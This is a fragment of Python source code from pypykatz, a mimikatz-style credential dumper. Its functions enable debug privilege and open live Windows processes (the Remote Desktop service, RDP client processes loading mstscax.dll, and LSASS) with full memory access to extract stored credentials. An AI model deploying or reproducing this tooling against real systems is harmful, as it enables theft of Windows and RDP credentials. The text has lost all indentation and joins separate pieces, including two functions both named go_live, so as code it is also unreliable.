def go_live(pid = None, all_rdp = False):
if platform.system() != 'Windows':
raise Exception('Live parsing will only work on Windows')
from pypykatz.commons.readers.local.common.live_reader_ctypes import OpenProcess, PROCESS_ALL_ACCESS
from pypykatz.commons.winapi.machine import LiveMachine
from pypykatz.commons.winapi.constants import PROCESS_VM_READ , PROCESS_VM_WRITE , PROCESS_VM_OPERATION , PROCESS_QUERY_INFORMATION , PROCESS_CREATE_THREAD
from pypykatz.commons.readers.local.common.privileges import enable_debug_privilege
from pypykatz.commons.readers.local.live_reader import LiveReader
from pypykatz.commons.readers.local.process import Process
req_access_rights = PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_QUERY_INFORMATION | PROCESS_CREATE_THREAD
enable_debug_privilege()
targets = []
if pid is not None:
process = Process(pid=pid, access = req_access_rights )
process.list_modules()
reader = LiveReader(process_handle=process.phandle)
sysinfo = KatzSystemInfo.from_live_reader(reader)
targets.append(RDPCredParser(process, reader.get_buffered_reader(), sysinfo))
else:
machine = LiveMachine()
for service_name, display_name, pid in machine.list_services():
if service_name == 'TermService':
process = Process(pid=pid, access = req_access_rights )
reader = LiveReader(process_handle=process.phandle)
sysinfo = KatzSystemInfo.from_live_reader(reader)
targets.append(RDPCredParser(process, reader.get_buffered_reader(), sysinfo))
if all_rdp is True:
for pid in machine.list_all_pids():
try:
process = Process(pid=pid, access = req_access_rights )
for module in process.list_modules():
if module.name.lower().find("mstscax.dll") != -1:
reader = LiveReader(process_handle=process.phandle)
sysinfo = KatzSystemInfo.from_live_reader(reader)
targets.append(RDPCredParser(process, reader.get_buffered_reader(), sysinfo))
break
except Exception as e:
#import traceback
#traceback.print_exc()
print(e)
for target in targets:
target.start()
return targets
def go_live_phandle(lsass_process_handle, packages=['all']):
if platform.system() != 'Windows':
raise Exception('Live parsing will only work on Windows')
from pypykatz.commons.readers.local.live_reader import LiveReader
reader = LiveReader(lsass_process_handle=lsass_process_handle)
sysinfo = KatzSystemInfo.from_live_reader(reader)
mimi = pypykatz(reader.get_buffered_reader(), sysinfo)
mimi.start(packages)
return mimi
def go_live():
if platform.system() != 'Windows':
raise Exception('Live parsing will only work on Windows')
from pypykatz.commons.readers.local.live_reader import LiveReader
reader = LiveReader()
sysinfo = KatzSystemInfo.from_live_reader(reader)
mimi = pypykatz(reader.get_buffered_reader(), sysinfo)
mimi.start()
return mimi